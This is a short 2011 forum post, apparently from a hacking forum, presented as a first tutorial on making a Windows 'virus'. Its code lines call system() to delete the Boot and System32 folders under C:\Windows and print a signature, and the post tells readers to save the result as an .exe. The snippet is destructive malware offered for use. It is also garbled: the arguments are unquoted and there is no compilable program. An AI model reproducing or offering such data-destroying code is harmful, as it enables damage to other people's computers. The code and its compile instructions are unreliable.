Sinisterly
how to make an virus for windows - Printable Version

+- Sinisterly (https://sinister.li)
+-- Forum: Coding (https://sinister.li/Forum-Coding)
+--- Forum: Coding (https://sinister.li/Forum-Coding--71)
+--- Thread: how to make an virus for windows (/Thread-how-to-make-an-virus-for-windows)



how to make an virus for windows - oc1d0n - 08-23-2011

Hello.
In this tutorial ill show u how to make an virus in cmd for windows.
Download DEV C++ or anything else what can Compil C
Than type:
system(cd C:\Windows);
system(del Boot);
system(del System32);
printf("Virus by oc1d0n\n");




and save this as .exe file
DONT OPEN THIS ON YOUR PC

Note: This is my first TutorialBiggrin